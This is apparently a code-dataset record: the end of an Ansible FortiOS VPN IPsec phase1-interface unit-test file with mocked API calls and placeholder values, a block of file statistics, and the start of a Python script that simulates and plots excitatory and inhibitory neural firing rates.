'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_vpn_ipsec_phase1_interface_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_vpn_ipsec_phase1_interface_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_vpn_ipsec_phase1_interface_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'random_attribute_not_valid': 'tag',
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
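# Running this module locally (a sketch; the 'mocker' fixture requires the
# pytest-mock plugin):
#   pip install pytest pytest-mock
#   pytest -q test_fortios_vpn_ipsec_phase1_interface.py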
| 40.690845
| 142
| 0.543241
| 5,850
| 57,781
| 4.991453
| 0.063932
| 0.160274
| 0.016438
| 0.020479
| 0.966301
| 0.963356
| 0.959075
| 0.9575
| 0.9575
| 0.9575
| 0
| 0.047297
| 0.305498
| 57,781
| 1,419
| 143
| 40.719521
| 0.680356
| 0.011492
| 0
| 0.971997
| 0
| 0
| 0.499869
| 0.073536
| 0
| 0
| 0
| 0
| 0.026529
| 1
| 0.005158
| false
| 0.022108
| 0.005895
| 0
| 0.011791
| 0.000737
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e04f3c12d804183e7146f65281d0c9691c84e65f
| 6,483
|
py
|
Python
|
src/Fig_2_supplement_3_Linear_networks_SSN_NTA.py
|
fmi-basel/gzenke-nonlinear-transient-amplification
|
f3b0c8c89b42c34f1aad740c7026865cf3164f1d
|
[
"MIT"
] | null | null | null |
src/Fig_2_supplement_3_Linear_networks_SSN_NTA.py
|
fmi-basel/gzenke-nonlinear-transient-amplification
|
f3b0c8c89b42c34f1aad740c7026865cf3164f1d
|
[
"MIT"
] | 3
|
2021-12-16T10:15:10.000Z
|
2021-12-16T12:54:24.000Z
|
src/Fig_2_supplement_3_Linear_networks_SSN_NTA.py
|
fmi-basel/gzenke-nonlinear-transient-amplification
|
f3b0c8c89b42c34f1aad740c7026865cf3164f1d
|
[
"MIT"
] | 1
|
2021-12-16T10:02:43.000Z
|
2021-12-16T10:02:43.000Z
|
import numpy as np
import matplotlib.pyplot as plt
# plotting configuration
ratio = 1.5
figure_len, figure_width = 15*ratio, 12*ratio
font_size_1, font_size_2 = 36*ratio, 36*ratio
legend_size = 18*ratio
line_width, tick_len = 3*ratio, 10*ratio
marker_size = 15*ratio
plot_line_width = 5*ratio
hfont = {'fontname': 'Arial'}
# simulation setup
dt = 0.0001
T = int(9/dt)
# neuronal parameters
tau_e, tau_i = 0.020, 0.010
alpha_e, alpha_i = 1, 1
# short-term depression
x, u_d = 1, 1
tau_x = 0.20
# network connectivity
Jee = 1.8
Jie = 1.0
Jei = 1.0
Jii = 0.6
r_e, r_i = 0, 0
z_e, z_i = 0, 0
l_r_e, l_r_i, l_x = [], [], []
for i in range(T):
if 50000 <= i < 70000:
g_e, g_i = 2.0, 2
else:
g_e, g_i = 1.55, 2
g_e = g_e * (g_e > 0)
g_i = g_i * (g_i > 0)
# SSN part
z_e = Jee * x * r_e - Jei * r_i + g_e
z_i = Jie * r_e - Jii * r_i + g_i
z_e = z_e * (z_e > 0)
z_i = z_i * (z_i > 0)
r_e = r_e + (-r_e + np.power(z_e, alpha_e)) / tau_e * dt
r_i = r_i + (-r_i + np.power(z_i, alpha_i)) / tau_i * dt
r_e = r_e * (r_e > 0)
r_i = r_i * (r_i > 0)
x = x + ((1 - x) / tau_x - u_d * x * r_e) * dt
x = np.clip(x, 0, 1)
l_r_e.append(r_e)
l_r_i.append(r_i)
l_x.append(x)
l_r_e = np.asarray(l_r_e)
l_r_i = np.asarray(l_r_i)
l_x = np.asarray(l_x)
# plotting
plt.figure(figsize=(figure_len, figure_width))
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(True)
ax.spines['left'].set_visible(True)
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(line_width)
plt.tick_params(width=line_width, length=tick_len)
plt.yscale('symlog', linthresh=0.1)  # 'linthreshy' was removed in Matplotlib 3.5
plt.plot(l_r_e, color='blue', linewidth=plot_line_width)
plt.plot(l_r_i, color='red', linewidth=plot_line_width)
plt.xticks(np.arange(30000, 90000 + 5000, 20000), np.arange(0, 6 + 0.5, 2), fontsize=font_size_1, **hfont)
plt.yticks([0, 1, 100, 10000], fontsize=font_size_1, **hfont)
plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)
plt.ylabel('Firing rate (Hz)', fontsize=font_size_1, **hfont)
plt.xlim([30000, 90000])
plt.ylim([0, 10000])
plt.legend(['Exc', 'Inh'], prop={"family": "Arial", 'size': font_size_1}, loc='upper right')
plt.savefig('paper_figures/png/Revision_Fig_Point_Linear_network.png')
plt.savefig('paper_figures/pdf/Revision_Fig_Point_Linear_network.pdf')
# simulation setup
dt = 0.0001
T = int(9/dt)
# neuronal parameters
tau_e, tau_i = 0.020, 0.010
alpha_e, alpha_i = 2, 2
# network connectivity
Jee = 1.8
Jie = 2.0
Jei = 1.0
Jii = 1.0
r_e, r_i = 0, 0
z_e, z_i = 0, 0
l_r_e, l_r_i = [], []
for i in range(T):
if 50000 <= i < 70000:
g_e, g_i = 2.0, 2
else:
g_e, g_i = 1.55, 2
g_e = g_e * (g_e > 0)
g_i = g_i * (g_i > 0)
# SSN part
z_e = Jee * r_e - Jei * r_i + g_e
z_i = Jie * r_e - Jii * r_i + g_i
z_e = z_e * (z_e > 0)
z_i = z_i * (z_i > 0)
r_e = r_e + (-r_e + np.power(z_e, alpha_e)) / tau_e * dt
r_i = r_i + (-r_i + np.power(z_i, alpha_i)) / tau_i * dt
r_e = r_e * (r_e > 0)
r_i = r_i * (r_i > 0)
l_r_e.append(r_e)
l_r_i.append(r_i)
l_r_e = np.asarray(l_r_e)
l_r_i = np.asarray(l_r_i)
# plotting
plt.figure(figsize=(figure_len, figure_width))
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(True)
ax.spines['left'].set_visible(True)
for axis in ['top', 'bottom', 'left', 'right']:
